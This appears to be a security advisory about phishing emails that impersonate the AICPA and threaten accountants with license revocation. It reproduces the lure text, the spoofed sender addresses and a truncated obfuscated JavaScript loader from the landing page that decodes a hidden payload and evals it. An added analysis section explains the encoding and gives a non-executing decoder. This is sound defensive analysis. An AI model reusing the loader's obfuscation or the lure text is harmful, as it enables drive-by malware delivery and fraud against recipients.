Emails regarding accountant license from AICPA lead to site with obfuscated JavaScript exploit


MX Lab, http://www.mxlab.eu, is seeing emails claiming that the recipient's accountant license from the AICPA will be revoked due to tax return fraud accusations.

The emails have subjects like:

Fraudulant tax return assistance accusations.
Income tax fraud accusations.
Income tax return fraud accusations.
Tax return fraud accusations.
Your accountant license can be revoked.
Your accountant CPA license termination.
….

The email is sent from spoofed addresses such as admin@aicpa.org, alerts@aicpa.org, risk@aicpa.org, info@aicpa.org, service@aicpa.org, risk.manager@aicpa.org, support@aicpa.org, … and has the following body:

Dear accountant officer,

We have been informed of your recent assistance in tax return fraud on behalf of one of your clients. According to AICPA Bylaw Subsection 765 your Certified Public Accountant status can be revoked in case of the act of filing of an incorrect or fraudulent tax return for your client or employer.

Please find the complaint below and provide your feedback to it within 7 days. The failure to do so within this term will result in cancellation of your Accountant status.

Here is an example of the message:

The message contains the URL “Complant.pdf”, which leads to a web host serving an HTML page with obfuscated JavaScript behind it.

The obfuscated JavaScript contains code that opens an iframe:

When I tried to access this page directly I got the following on my screen:

When viewing the HTML source code we found the following additional code:

<html><body><div style="display:none;"><p>@wpgtp@^p^@pg^p@tpgwp^opop^^p^2pg3p
^op@tp-2p-3pzwp@^p@tpgwp^op@tp^2p20pzwpg2p^p20p3wpggp@tp@@p^3p@tp-z0p^^p@@pg3p
^op-z0p^0p@@pgzp@tp-z0pg3p^3p-z0pggpgtp@@p@wpg3pgwpgzpopopopzwp@pg2p^p20pzwp@p
@^p@tpgwp^op@tp^2p20pzwpg2p^2p20p-3p-zpz^pg0p^@pgwp@^p^opg3pgtpgwp-z0p@tpgwp@wp
@3p^2p@tp@wpg3p^2p@tp@^p^op-2p-zpwzpw3p^gp@@p^2p-
......
......SHORTENED VERSION OF THE CODE.....
......
zpz^</p></div><script>
ss='s';g='g';r='r';
try{new window(123).asd;}catch(qq){aa=/s/g.exec("a"+"sd").index+[];e=eval;}
aaa=1+[];
i=0;
try{new window(123).qwey();}catch(qqq){
if(aaa==aa)
while(1){
	a=document.body.childNodes[i];
	if(a.tagName.toLowerCase() == "div") break;
	i++;
}
a=a.childNodes[0].innerHTML[r+'eplace'](/\^/g,"7")[r+'eplace'](/@/g,"5")
[r+'eplace'](/g/g,"6")[r+'eplace'](/z/g,"1")[r+'eplace'](/w/g,"8")
[r+'eplace'](/t/g,"9")[r+'eplace'](/o/g,"4");}
a=a.split("p");
md='a';
			c=[];
			i=0;
			p=parseInt;
			try{new RegExp("12").exec("41").type+1;}catch(qqq){qq=String;}
			try{new RegExp("12").exec("41").type+1;}catch(qqq){fr="fromChar";}
			try{new RegExp("12").exec("41").type+1;}catch(qqq){fr+="Code";}
			try{new RegExp("12").exec("41").type+1;}catch(qqq){qq=qq[fr];}
if(aaa==aa){
			while(15042>i){
				vv=a[i];
				r2=cc=qq(41+1+p(vv));
				r=c;
				if(fr)c=r+r2;
				i=i+1;
			}
			w=e;
			w(c);
}
		</script></body></html>
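The script above is only a loader: the real payload sits in the hidden <p>, written as 'p'-separated integers in which seven digits have been swapped for letters, and the script maps the letters back, adds 42 to each value, turns it into a character and hands the result to eval. The try/catch blocks only assign their variables when the engine throws where a browser would, which is what makes the sample fall over in simplistic emulators. The following is an added example, not code from the post or from the sample: a static decoder an analyst can run offline against a saved copy of the page, returning the hidden string instead of executing it. The offset of 42 and the letter table are read from the loader; the extraction regex, the function names and the constructed "Hi" blob are this example's own.

```javascript
// Added example (not from the original post): a static decoder for the
// letter-for-digit encoding in the loader above. It returns the hidden
// payload as a string and never passes it to eval().

// Substitution table read from the loader's replace() chain:
// ^->7, @->5, g->6, z->1, w->8, t->9, o->4. Digits 0, 2, 3 and the
// minus sign are not substituted and pass through unchanged.
const DIGIT_MAP = { '^': '7', '@': '5', 'g': '6', 'z': '1', 'w': '8', 't': '9', 'o': '4' };

// The loader computes qq(41+1+p(vv)), i.e. String.fromCharCode(42 + parseInt(token)).
const OFFSET = 42;

// Decode one encoded blob (the text inside the hidden <p>) into a string.
function decodeBlob(blob) {
  // Whitespace in the blob (line wrapping in a saved copy) carries no data.
  const compact = blob.replace(/\s+/g, '');
  // Step 1: undo the letter-for-digit substitution. A single pass is
  // equivalent to the loader's seven chained replace() calls because no
  // replacement digit is itself one of the pattern letters.
  let digits = '';
  for (const ch of compact) digits += DIGIT_MAP[ch] ?? ch;
  // Step 2: 'p' separates tokens; each token is a (possibly negative) integer.
  // Step 3: parseInt(token) + 42 is a character code. Empty or cut-off tokens
  // (the blob ends on a separator, and the post truncates it) give NaN; skip them.
  let out = '';
  for (const tok of digits.split('p')) {
    const n = parseInt(tok, 10);
    if (!Number.isNaN(n)) out += String.fromCharCode(n + OFFSET);
  }
  return out;
}

// Pull the blob out of a saved HTML page the way the loader does (first <div>,
// first <p>), using a regex so no DOM is built and no script is executed.
// Hypothetical helper: adequate for this sample's layout, not a general parser.
function extractBlob(html) {
  const m = /<div[^>]*>\s*<p>([^<]*)<\/p>/i.exec(html);
  return m ? m[1] : null;
}

// Convenience wrapper: saved page in, decoded payload string out.
function decodePage(html) {
  const blob = extractBlob(html);
  return blob === null ? null : decodeBlob(blob);
}

// Constructed sample (not from the page): "Hi" is codes 72 and 105, minus 42
// gives 30 and 63, and 63 is written "g3" under the table above.
const SAMPLE_BLOB = '30pg3p';

// The first five lines of the hidden <p> exactly as the post reproduces them;
// the post shortens the rest, so only the opening of the payload is recoverable.
const PAGE_BLOB_PREFIX = [
  '@wpgtp@^p^@pg^p@tpgwp^opop^^p^2pg3p',
  '^op@tp-2p-3pzwp@^p@tpgwp^op@tp^2p20pzwpg2p^p20p3wpggp@tp@@p^3p@tp-z0p^^p@@pg3p',
  '^op-z0p^0p@@pgzp@tp-z0pg3p^3p-z0pggpgtp@@p@wpg3pgwpgzpopopopzwp@pg2p^p20pzwp@p',
  '@^p@tpgwp^op@tp^2p20pzwpg2p^2p20p-3p-zpz^pg0p^@pgwp@^p^opg3pgtpgwp-z0p@tpgwp@wp',
  '@3p^2p@tp@wpg3p^2p@tp@^p^op-2p-zpwzpw3p^gp@@p^2p-',
].join('\n');

console.log(decodeBlob(SAMPLE_BLOB));
console.log(decodeBlob(PAGE_BLOB_PREFIX));
```

Run against the five lines the post reproduces, the decoder yields a document.write of a “Please wait page is loading...” heading followed by the start of a function; the remainder of the payload is not recoverable because the post shortens the blob. The point of doing it this way is that the analyst reads the payload without ever executing it, and without depending on the browser-specific exceptions the loader uses to gate its own decoding.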

Recommended action when you receive this type of message: delete it and do not click any of the embedded URLs: the “View it in your browser” link at the top, the Complaint.pdf URL, or the link at the end of the message.